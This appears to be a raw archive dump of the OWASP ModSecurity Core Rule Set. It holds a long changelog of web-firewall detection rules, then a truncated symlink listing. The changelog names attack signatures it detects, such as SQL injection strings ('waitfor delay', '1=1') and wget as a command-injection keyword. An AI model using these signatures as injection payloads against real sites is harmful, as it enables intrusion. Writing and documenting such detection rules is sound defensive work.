pax_global_header00006660000000000000000000000064121645725640014526gustar00rootroot0000000000000052 comment=0f07cbb9c6ea76bd90169c2f3bed1bc22f75d01d SpiderLabs-owasp-modsecurity-crs-0f07cbb/000077500000000000000000000000001216457256400205245ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/.gitignore000066400000000000000000000000141216457256400225070ustar00rootroot00000000000000*.swp *.swo SpiderLabs-owasp-modsecurity-crs-0f07cbb/CHANGES000066400000000000000000001143501216457256400215230ustar00rootroot00000000000000== OWASP ModSecurity Core Rule Set (CRS) CHANGES == == Report Bugs/Issues to GitHub Issues Tracker == * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues == Version 2.2.8 - 06/30/2013 == Security Fixes: Improvements: * Updatd the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43 * Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) - http://seclists.org/fulldisclosure/2013/Jun/21 - http://blog.spiderlabs.com/2013/06/honeypot-alert-active-exploits-attempts-for-plesk-vulnerability-.html Bug Fixes: * fix 950901 - word boundary added - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/48 * fix regex error - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/44 * Updated the Regex in 981244 to include word boundaries - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/36 * Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/34 * ModSecurity: No action id present within the rule - ignore_static.conf - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/17 * "Bad robots" rule blocks all Java applets on Windows XP machines - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/16 * duplicated rules id 981173 - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18 == Version 2.2.7 - 12/19/2012 == Security Fixes: Improvements: * Added JS Overrides file to identify successfull XSS probes * Added new XSS Detection Rules from Ashar Javed (http://twitter.com/soaj1664ashar) - http://jsfiddle.net/U9RmU/4/ * Updated the SQLi Filters to add in Oracle specific functions - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/7 Bug Fixes: * Fixed Session Hijacking rules - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/8 * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable == Version 2.2.6 - 09/14/2012 == Security Fixes: Improvements: * Started rule formatting update for better readability * Added maturity and accuracy action data to each rule * Updated rule revision (rev) action * Added rule version (ver) action * Added more regression tests (util/regression_tests/) * Modified Rule ID 960342 to block large file attachments in phase:1 * Removed all PARANOID rule checks * Added new Session Fixation rules Bug Fixes: * Fixed missing ending double-quotes in XSS rules file * Moved SecDefaultAction setting from phase:2 to phase:1 * Fixed Session Hijacking SessionID Regex https://www.modsecurity.org/tracker/browse/CORERULES-79 * Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME https://www.modsecurity.org/tracker/browse/CORERULES-78 == Version 2.2.5 - 06/14/2012 == Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) * Updated Content-Type check to fix possible evasion with @within (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) Improvements: * Renamed main config file to modsecurity_crs_10_setup.conf * Updated the rule IDs to start from CRS reserved range: 900000 * Updated rule formatting for readibility * Updated the CSRF rules to use UNIQUE_ID as the token source * Added the zap2modsec.pl script to the /util directory which converts OWASP ZAP Scanner XML data into ModSecurity Virtual Patches * Updated the Directory Traversal Signatures to include more obfuscated data * Added Arachni Scanner Integration Lua script/rules files Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 == Version 2.2.4 - 03/14/2012 == Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 * Added a README file to the activated_rules directory * Consolidate a number of SQL Injection rules into optimized regexs * Removed multiMatch and replaceComments from SQL Injection rules * Updated the SQLi regexs for greediness * Updated the SQLi setvar anomaly score values to use macro expansion * Removed PARANOID mode rules Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 * Fixed duplidate rule IDs == Version 2.2.3 - 12/19/2011 == Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies * Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#header Bug Fixes: * Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). * Updated the regex and added tags for RFI rules. == Version 2.2.2 - 09/28/2011 == Improvements: * Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points * Added new Range header detection checks to prevent Apache DoS * Added new Security Scanner User-Agent strings * Added example script to the /util directory to convert Arachni DAST scanner XML data into ModSecurity virtual patching rules. * Updated the SQLi Character Anomaly Detection Rules * Added Host header info to the RESOURCE collection key for AppSensor profiling rules Bug Fixes: * Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) * Fixed Request Limit rules by removing & from variables * Fixed Session Hijacking IP/UA hash captures * Updated the SQLi regex for rule ID 981242 == Version 2.2.1 - 07/20/2011 == Improvements: * Extensive SQL Injection signature updates as a result of the SQLi Challenge http://www.modsecurity.org/demo/challenge.html * Updated the SQL Error message detection in reponse bodies * Updated SQL Injection signatures to include more DB functions * Updated the WEAK SQL Injection signatures * Added tag AppSensor/RE8 to rule ID 960018 Bug Fixes: * Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches https://www.modsecurity.org/tracker/browse/CORERULES-70 * Fixed Session Hijacking rules to properly capture IP address network hashes. * Added the multiMatch action to the SQLi rules * Fixed a false negative logic flaw within the advanced_filter_converter.lua script * Fixed missing : in id action in DoS ruleset. * Updated rule ID 971150 signature to remove ; == Version 2.2.0 - 05/26/2011 == Improvements: * Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) http://www.apache.org/licenses/LICENSE-2.0.txt * Created new INSTALL file outlining quick config setup * Added a new rule regression testing framework to the /util directory * Added new activated_rules directory which will allow users to place symlinks pointing to files they want to run. This allows for easier Apache Include wild-carding * Adding in new RULE_MATURITY and RULE_ACCURACY tags * Adding in a check for X-Forwarded-For source IP when creating IP collection * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added new AppSensor rules to experimental_dir https://www.owasp.org/index.php/AppSensor_DetectionPoints * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html * Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html * Global collection in the 10 file now uses the Host Request Header as the collection key. This allows for per-site global collections. * Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilties. This includes both converted web rules from Emerging Threats (ET) and from SLR Team. * Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB * Added experimental rules for detecting Open Proxy Abuse http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html * Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API http://blog.spiderlabs.com/2011/02/modsecurity-advanced-topic-of-the-week-passive-vulnerability-scanning-part-1-osvdb-checks.html * Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) * Added new SQLi detection rules (959070, 959071 and 959072) * Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data https://www.modsecurity.org/tracker/browse/CORERULES-64 Bug Fixes: * Assigned IDs to all active SecRules/SecActions * Removed rule inversion (!) from rule ID 960902 * Fixed false negative issue in Response Splitting Rule * Fixed false negative issue with @validateByteRange check * Updated the TARGETS lising for rule ID 950908 * Updated TX data for REQBODY processing * Changed the pass action to block in the RFI rules in the 40 generic file * Updated RFI regex to catch IP address usage in hostname https://www.modsecurity.org/tracker/browse/CORERULES-68 * Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. * Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. They will now inherit the settings from the SecDefaultAction == Version 2.1.2 - 02/17/2011 == Improvements: * Added experimental real-time application profiling ruleset. * Added experimental Lua script for profiling the # of page scripts, iframes, etc.. which will help to identify successful XSS attacks and planting of malware links. * Added new CSRF detection rule which will trigger if a subsequent request comes too quickly (need to use the Ignore Static Content rules). Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set == Version 2.1.1 - 12/30/2010 == Bug Fixes: * Updated the 10 config conf file to add in pass action to User-Agent rule * Updated the CSRF ruleset to conditionally do content injection - if the csrf token was created by the session hijacking conf file * Updated the session hijacking conf file to only enforce rules if a SessionID Cookie was submitted * Fixed macro expansion setvar bug in the restricted file extension rule * Moved the comment spam data file into the optional_rules directory == Version 2.1.0 - 12/29/2010 == Improvements: * Added Experimental Lua Converter script to normalize payloads. Based on PHPIDS Converter code and it used with the advanced filters conf file. * Changed the name of PHPIDS converted rules to Advanced Filters * Added Ignore Static Content (Performance enhancement) rule set * Added XML Enabler (Web Services) rule set which will parse XML data * Added Authorized Vulnerability Scanning (AVS) Whitelist rule set * Added Denial of Service (DoS) Protection rule set * Added Slow HTTP DoS (Connection Consumption) Protection rule set * Added Brute Force Attack Protection rule set * Added Session Hijacking Detection rule set * Added Username Tracking rule set * Added Authentication Tracking rule set * Added Anti-Virus Scanning of File Attachments rule set * Added AV Scanning program to /util directory * Added Credit Card Usage Tracking/Leakage Prevention rule set * Added experimental CC Track/PAN Leakage Prevention rule set * Added an experimental_rules directory to hold new BETA rules * Moved the local exceptions conf file back into base_rules dirctory however it has a ".example" extension to prevent overwriting customized versions when upgrading * Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to the experimental_rules directory * Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will help to make collections a bit more unique == Version 2.0.10 - 11/29/2010 == Improvements: * Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS is running in traditional mode. Bug Fixes: * Moved all skipAfter actions in chained rules to chain starter SecRules https://www.modsecurity.org/tracker/browse/MODSEC-159 * Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs == Version 2.0.9 - 11/17/2010 == Improvements: * Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that it will not overwrite existing config settings. Users should rename this file to activate it. * Traditional detection mode is now the current default * Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode by editing the modsecurity_crs_10_config.conf file * Updated the disruptive actions in most rules to use "block" action instead of "pass". This is to allow for the toggling between traditional vs. anomaly scoring modes. * Removed logging actions from most rules so that it can be controlled from the SecDefaultAction setting in the modsecurity_crs_10_config.conf file * Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match what is used in the PHPIDS rules. These still have the same factor of severity even though the numbers themselves are smaller. * Updated the 49 and 59 blocking rules to include the matched logdata * Updated the TAG data to further classify attack/vuln categories. * Updated the SQL Injection filters to detect more boolean logic attacks * Moved some files to optional_rules directory (phpids, Emerging Threats rules) Bug Fixes: * Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote https://www.modsecurity.org/tracker/browse/CORERULES-63 * Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) https://www.modsecurity.org/tracker/browse/MODSEC-159 * Fixed restricted file extension bug with macro expansion https://www.modsecurity.org/tracker/browse/CORERULES-60 * Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that it matches what is being set in the sql injection conf file * Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) https://www.modsecurity.org/tracker/browse/CORERULES-62 == Version 2.0.8 - 08/27/2010 == Improvements: * Updated the PHPIDS filters * Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) * Updated the SQL Injection fitlers to account for different quotes * Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file * Added Rule ID 950109 to detect multiple URL encodings * Added two experimental rules to detect anomalous use of special characters Bug Fixes: * Fixed Encoding Detection RegEx (950107 and 950108) * Fixed rules-updater.pl script to better handle whitespace https://www.modsecurity.org/tracker/browse/MODSEC-167 * Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf https://www.modsecurity.org/tracker/browse/CORERULES-55 * Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file https://www.modsecurity.org/tracker/browse/CORERULES-54 * Updated XSS rule id 958001 to improve the .cookie regex to reduce false postives https://www.modsecurity.org/tracker/browse/CORERULES-29 == Version 2.0.7 - 06/4/2010 == Improvements: * Added CSRF Protection Ruleset which will use Content Injection to add javascript to specific outbound data and then validate the csrf token on subsequent requests. * Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie flags * Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied data being echoed back to user unchanged. * Added rules-updater.pl script and configuration file to allow users to automatically download CRS rules from the CRS rules repository. * Added new SQLi keyword for ciel() and reverse() functions. * Updated the PHPIDS filters Bug Fixes: * Fixed false positives for Request Header Name matching in the 30 file by adding boundary characters. * Added missing pass actions to @pmFromFile prequalifier rules * Added backslash to SQLi regex https://www.modsecurity.org/tracker/browse/CORERULES-41 * Fixed hard coded anomaly score in PHPIDS filter file https://www.modsecurity.org/tracker/browse/CORERULES-45 * Fixed restricted_extension false positive by adding boundary characters == Version 2.0.6 - 02/26/2010 == Bug Fixes: * Added missing transformation functions to SQLi rules. https://www.modsecurity.org/tracker/browse/CORERULES-32 * Fixed duplicate rule IDs. https://www.modsecurity.org/tracker/browse/CORERULES-33 * Fixed typo in @pmFromFile in the Comment SPAM rules https://www.modsecurity.org/tracker/browse/CORERULES-34 * Added macro expansion to Restricted Headers rule https://www.modsecurity.org/tracker/browse/CORERULES-35 * Fixed misspelled SecMarker https://www.modsecurity.org/tracker/browse/CORERULES-36 * Fixed missing chain action in Content-Type header check https://www.modsecurity.org/tracker/browse/CORERULES-37 * Update phpids filters to use pass action instead of block == Version 2.0.5 - 02/01/2010 == Improvements: * Removed previous 10 config files as they may conflict with local customized Mod configs. * Added a new 10 config file that allows the user to globally set TX variables to turn on/off PARANOID_MODE inspection, set anomaly score levels and http policies. Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. * Added Rule Logic and Reference links to rules descriptions. * Added Rule IDs to all rules. * Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification * Removed Apache limit directives from the 23 file * Added macro expansion to 23 file checks. * Added @pmFromFile check to 35 bad robots file * Added malicious UA strings to 35 bad robots check * Created an experimental rules file * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection https://www.modsecurity.org/tracker/browse/MODSEC-120 * Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the request headers. * Updated Inbound blocking conf file to use macro expansion from the 10 config file settings * Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. * Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. * Updated the SPAMMER RBL check rules logic to only check once per IP/Day. * Added new outbound malware link detection rules. * Added PHP "call_user_func" to blacklist Identified by SOGETI ESEC R&D Bug Fixes: * Removed Non-numeric Rule IDs https://www.modsecurity.org/tracker/browse/CORERULES-28 * Updated the variable list on SQLi rules. * Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring and blocking == Version 2.0.4 - 11/30/2009 == Improvements: * Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) * Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found then search more generically in request_body|request_uri_raw * Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate alerts for any variable matches that exist. Bug Fixes: * Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of phase:4 which would allow for blocking based on information leakage issues. == Version 2.0.3 - 11/05/2009 == Improvements: * Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) * Create a new PHPIDS Converter rules file (https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php) * Added new rules to identify multipart/form-data bypass attempts * Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts Bug Fixes: * Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives https://www.modsecurity.org/tracker/browse/CORERULES-17 * Added new variable locations to the phpids filters https://www.modsecurity.org/tracker/browse/CORERULES-19 * Use of transformation functions can cause false negatives - added multiMatch action to phpids rules https://www.modsecurity.org/tracker/browse/CORERULES-20 * Fixed multipart parsing evasion issues by adding strict parsing rules https://www.modsecurity.org/tracker/browse/CORERULES-21 * Fixed typo in xss rules (missing |) https://www.modsecurity.org/tracker/browse/CORERULES-22 * Fixed regex text in IE8 XSS filters (changed to lowercase) https://www.modsecurity.org/tracker/browse/CORERULES-23 == Version 2.0.2 - 09/11/2009 == Improvements: * Added converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) https://www.modsecurity.org/tracker/browse/CORERULES-13 Bug Fixes: * Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. https://www.modsecurity.org/tracker/browse/CORERULES-15 == Version 2.0.1 - 08/07/2009 == Improvements: * Updated the transformation functions used in the XSS/SQLi rules to improve performance https://www.modsecurity.org/tracker/browse/CORERULES-10 * Updated the variable/target list in the XSS rules https://www.modsecurity.org/tracker/browse/CORERULES-11 * Added XSS Filters from IE8 https://www.modsecurity.org/tracker/browse/CORERULES-12 Bug Fixes: * Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule. https://www.modsecurity.org/tracker/browse/CORERULES-9 == Version 2.0.0 - 07/29/2009 == New Rules & Features: * Fine Grained Policy The rules have been split to having one signature per rule instead of having all signatures combined into one optimized regular expression. This should allow you to modify/disable events based on specific patterns instead of having to deal with the whole rule. * Converted Snort Rules Emerging Threat web attack rules have been converted. http://www.emergingthreats.net/ * Anomaly Scoring Mode Option The rules have been updated to include anomaly scoring variables which allow you to evaluate the score at the end of phase:2 and phase:5 and decide on what logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound events and outbound events and will provide a result of successful atttack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: - 0: Emergency - is generated from correlation where there is an inbound attack and an outbound leakage. - 1: Alert - is generated from correlation where there is an inbound attack and an outbound application level error. - 2: Critical - is the highest severity level possible without correlation. It is normally generated by the web attack rules (40 level files). - 3: Error - is generated mostly from outbound leakabe rules (50 level files). - 4: Warning - is generated by malicious client rules (35 level files). - 5: Notice - is generated by the Protocol policy and anomaly files. - 6: Info - is generated by the search engine clients (55 marketing file). * Updated Comment SPAM Protections Updated rules to include RBL lookups and client fingerprinting concepts from Bad Behavior (www.bad-behavior.ioerror.us) * Creation of Global Collection Automatically create a Global collection in the *10* config file. Other rules can then access it. * Use of Block Action Updated the rules to use the "block" action. This allows the Admin to globally set the desired block action once with SecDefaultAction in the *10* config file rather than having to edit the disruptive actions in all of the rules or for the need to have multiple versions of the rules (blocking vs. non-blocking). * "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html * Added new generic RFI detection rules. http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html * "Possibly malicious iframe tag in output" (Rules 981001,981002) Planting invisible iframes in a site can be used by attackers to point users from the victim site to their malicious site. This is actually as if the user was visiting the attacker's site himself, causing the user's browser to process the content in the attacker's site. New Events: * Rule 960019 - Expect Header Not Allowed. * Rule 960020 - Pragma Header Requires Cache-Control Header * Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character as it is reserved for use as a fragment identifier within the html page. * Rule 958291 - Range: field exists and begins with 0. * Rule 958292 - Invalid Request Header Found. * Rule 958293 - Lowercase Via Request Header Found. * Rule 958294 - Common SPAM Proxies found in Via Request Header. * Rule 958295 - Multiple/Conflicting Connection Header Data Found. * Rule 958296 - Request Indicates a SPAM client accessed the Site. * Rule 958297 - Common SPAM/Email Harvester crawler. * Rule 958298 - Common SPAM/Email Harvester crawler Bug Fixes: * Rule 950107 - Split the rule into 2 separate rules to factor in the Content-Type when inspecting the REQUEST_BODY variable. * Rule 960017 - Bug fix for when having port in the host header. * Rule 960014 - Bug fix to correlate the SERVER_NAME variable. * Rule 950801 - Increased the logic so that the rule will only run if the web site uses UTF-8 Encoding. * Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and allow the IPv6 loopback address * Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG and to identify offsite hosts by comparing the ARG URI to the Host header. Due to this rule now being stronger, moved it from optional tight security rule to *40* generic attacks file. Other Fixes: * Added more HTTP Protocol violations to *20* file. * Set the SecDefaultAction in the *10* config file to log/pass (This was the default setting, however this sets it explicitly. * Added SecResponseBodyLimitAction ProcessPartial to the *10* config file. This was added so that when running the SecRuleEngine in DetectionOnly mode, it will not deny response bodies that go over the size restrictions. * Changed SecServerSignature to "Apache/1.3.28" * Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have BEGIN and END SecMarkers for rule groups to more accurately allow moving to proper locations. * Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. This removes the need for some SecAction/SkipAfter rules. * Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier rules and chained rules). == Version 1.6.1 - 2008/04/22 == * Fixed a bug where phases and transformations where not specified explicitly in rules. The issue affected a significant number of rules, and we strongly recommend to upgrade. == Version 1.6.0 - 2008/02/19 == New Rulesets & Features: * 42 - Tight Security This ruleset contains currently 2 rules which are considered highly prone to FPs. They take care of Path Traversal attacks, and RFI attacks. This ruleset is included in the optional_rulesets dir * 42 - Comment Spam Comment Spam is used by the spammers to increase their rating in search engines by posting links to their site in other sites that allow posting of comments and messages. The rules in this ruleset will work against that. (Requires ModSecurity 2.5) * Tags A single type of attack is often detected by multiple rules. The new alert classification tags solve this issue by providing an alternative alert type indication and can serve for filtering and analysis of audit logs. The classification tags are hierarchical with slashes separating levels. Usually there are two levels with the top level describing the alert group and the lower level denoting the alert type itself, for example: WEB_ATTACK/SQL_INJECTION. False Positives Fixes: * Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs * Rule 950107 - Will look for invalid url decoding in variables that are not automatically url decoded Additional rules logic: * Using the new "logdata" action for logging the matched signature in rules * When logging an event once, init the collection only if the alert needs to log * Using the new operator @pm as a qualifier before large rules to enhance performance (Requires ModSecurity 2.5) * SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not only 1=1. (Thanks to Marc Stern for the idea) * New XSS signatures - iframe & flash XSS == Version 1.5.1 - 2007/12/6 == False Positives Fixes: * Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) New Events: * 960019 - Detect HTTP/0.9 Requests HTTP/0.9 request are not common these days. This rule will log by default, and block in the blocking version of file 21 Other Fixes: * File 40, Rules 950004,950005 - Repaired the correction for the double url decoding problem * File 55 contained empty regular expressions. Fixed. == Version 1.5 - 2007/11/23 == New Rulesets: * 23 - Request Limits "Judging by appearances". This rulesets contains rules blocking based on the size of the request, for example, a request with too many arguments will be denied. Default policy changes: * XML protection off by default * BLOCKING dir renamed to optional_rules * Ruleset 55 (marketing) is now optional (added to the optional_rules dir) * Ruleset 21 - The exception for apache internal monitor will not log anymore New Events: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. Additional rules logic: * 950001 - New signature: delete from * 950007 - New signature: waitfor delay False Positives Fixes: * 950006 - Will not be looking for /cc pattern in User-Agent header * 950002 - "Internet Explorer" signature removed * Double decoding bug used to cause FPs. Some of the parameters are already url-decoded by apache. This caused FPs when the rule performed another url-decoding transformation. The rules have been split so that parameters already decoded by apache will not be decoded by the rules anymore. * 960911 - Expression is much more permissive now * 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, then you should uncomment this rule (in file 20) version 1.4.3 - 2007/07/21 New Events: * 950012 - HTTP Request Smuggling For more info on this attack: http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. False Positives Fixes: * 950107 - Will allow a % sign in the middle of a string as well * 960911 - A more accurate expression based on the rfc: http://www.ietf.org/rfc/rfc2396.txt * 950015 - Will not look for http/ pattern in the request headers Additional rules logic: * Since Apache applies scope directives only after ModSecurity phase 1 this directives cannot be used to exclude phase 1 rules. Therefore we moved all inspection rules to phase 2. version 1.4 build 2 - 2007/05/17 New Feature: * Search for signatures in XML content XML Content will be parsed and ispected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt Full-width unicode can by used to bypass content inspection. Such encoding will be forbidden http://www.kb.cert.org/vuls/id/739224 * 960911 - Invalid HTTP request line Enforce request line to be valid, i.e.: * 960904 - Request Missing Content-Type (when there is content) When a request contains content, the content-type must be specified. If not, the content will not be inspected * 970018 - IIS installed in default location (any drive) Log once if IIS in installed in the /Inetpub directory (on any drive, not only C) * 950019 - Email Injection Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails Regular expressions fixes: * Further optimization of some regular expressions (using the non-greediness operator) The non-greediness operator, , prevents excessive backtracking FP fixes: * Rule 950107 - Will allow a parameter to end in a % sign from now on version 1.4 - 2007/05/02 New Events: * 970021 - WebLogic information disclosure Matching of "JSP compile error" in the response body, will trigger this rule, with severity 4 (Warning) * 950015,950910,950911 - HTTP Response Splitting Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: * 960902 - Content-Encoding in request not supported Any incoming compressed request will be denied * 960903 - Content-Encoding in response not suppoted An outgoing compressed response will be logged to alert, but ONLY ONCE. False Positives Fixes: * Removed <.exe>,<.shtml> from restricted extensions * Will not be looking for SQL Injection signatures , in the Via request header * Excluded Referer header from SQL injection, XSS and command injection rules * Excluded X-OS-Prefs header from command injection rule * Will be looking for command injection signatures in REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. * Allowing charset specification in the Content-Type Additional rules logic: * Corrected match of OPTIONS method in event 960015 * Changed location for event 960014 (proxy access) to REQUEST_URI_RAW * Moved all rules apart from method inspection from phase 1 to phase 2 - This will enable viewing content if such a rule triggers as well as setting exceptions using Apache scope tags. * Added match for double quote in addition to single quote for signature (SQL Injection) * Added 1=1 signature (SQL Injection) version 1.3.2 build 4 2007/01/17 Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule == Version 1.3.2 build 3 2007/01/10 == Fixed regular expression in rule 960010 (file #30) to allow multipart form data content == Version 1.3.2 - 2006/12/27 == New events: * 960037 Directory is restricted by policy * 960038 HTTP header is restricted by policy Regular expressions fixes: * Regular expressions with @ at end of beginning (for example "@import) * Regular expressions with un-escaped "." * Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) * The command injection wget is not searched in the UA header as it has different meaning there. * LDAP Fixed to reduce FPs: + More accurate regular expressions + high bit characters not accpeted between signature tokens. * Do not detect /usr/local/apache/conf/crs/base_rules/GsbMalware.dat lrwxr-xr-x 1 root wheel 68 May 17 14:01 modsecurity_35_bad_robots.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_bad_robots.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_35_scanners.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_scanners.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_40_generic_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_40_generic_attacks.data lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_41_sql_injection_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_41_sql_injection_attacks.data lrwxr-xr-x 1 root wheel 74 May 17 14:14 modsecurity_42_comment_spam.data -> /usr/local/apache/conf/crs/optional_rules/modsecurity_42_comment_spam.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_50_outbound.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound.data lrwxr-xr-x 1 root wheel 74 May 17 14:01 modsecurity_50_outbound_malware.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound_malware.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_14_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_14_customrules.conf lrwxr-xr-x 1 root wheel 57 May 17 14:22 